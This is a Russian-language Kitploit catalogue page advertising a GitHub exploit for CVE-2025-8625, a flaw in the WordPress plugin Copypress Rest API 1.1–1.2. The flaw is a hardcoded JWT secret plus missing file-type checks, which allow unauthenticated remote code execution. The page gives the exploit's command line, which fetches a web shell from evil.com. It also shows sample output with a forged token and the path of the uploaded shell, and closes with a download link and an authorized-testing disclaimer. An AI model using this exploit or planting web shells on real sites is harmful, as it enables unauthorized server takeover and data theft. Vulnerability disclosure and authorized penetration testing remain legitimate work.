Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-8625 — Copypress Rest API 1.1 - 1.2 - Отсутствие настраиваемого JWT-секрета и проверки типа файлов, приводящее к неаутентифицированному удалённому выполнению кода | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-8625
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubnxploited/cve-2025-8625

CVE-2025-8625

Copypress Rest API 1.1 - 1.2 - Отсутствие настраиваемого JWT-секрета и проверки типа файлов, приводящее к неаутентифицированному удалённому выполнению кода

Репозиторий
210 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-8625

Copypress Rest API 1.1 - 1.2 - Отсутствие настраиваемого секрета JWT и проверки типа файлов, ведущее к неаутентифицированному удалённому выполнению кода

🛡️ Copypress Rest API 1.1 - 1.2 RCE-эксплойт

📝 Описание

Плагин Copypress Rest API для WordPress (версии с 1.1 по 1.2) уязвим к удалённому выполнению кода через функцию copyreap_handle_image().
Плагин использует жёстко заданный ключ подписи JWT, когда секрет не установлен, и не проверяет типы файлов, что позволяет неаутентифицированным злоумышленникам подделывать токены и загружать произвольные файлы (например, PHP-шеллы) через конечную точку обработчика изображений.

  • CVE: CVE-2025-8625
  • CVSS: 9.8 (Критический)

🚀 Обзор скрипта

Имя скрипта: CVE-2025-8625.py
Этот Python-скрипт автоматизирует эксплуатацию уязвимости, позволяя вам сгенерировать действительный JWT, отправить специально сформированный запрос и загрузить вредоносный файл (веб-шелл) на уязвимый сайт WordPress.


⚙️ Использование

root@kitploit:~
python CVE-2025-8625.py -u https://target.com -shell https://evil.com/shell.php
  • -u / --url: Целевой URL сайта WordPress
  • -shell / --shell: Прямая ссылка на ваш веб-шелл или вредоносный PHP-файл

Пример вывода:

root@kitploit:~
JWT: eyJ0eXAiOiJKV1QiLCJhbGciOi...
HTTP 201: {"created":true,"id":123,"message":"Success"}
Exploit success! Check your shell upload.

🏆 Возможности

  • Генерирует действительный JWT, используя жёстко заданный секрет плагина
  • Обходит аутентификацию для загрузки произвольных файлов
  • Предоставляет понятный вывод об успехе или неудаче эксплуатации
  • Простой интерфейс командной строки

📂 Расположение загружаемого шелла

Шелл успешно загружен! 🎉
Пример пути к шеллу:

root@kitploit:~
https://target.com/wp-content/uploads/2025/10/shell.php

⚠️ Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и авторизованного тестирования на проникновение.
Использование против целей без явного разрешения незаконно.


Автор: Nxploited (Khaled Alenazi)

Скачать инструмент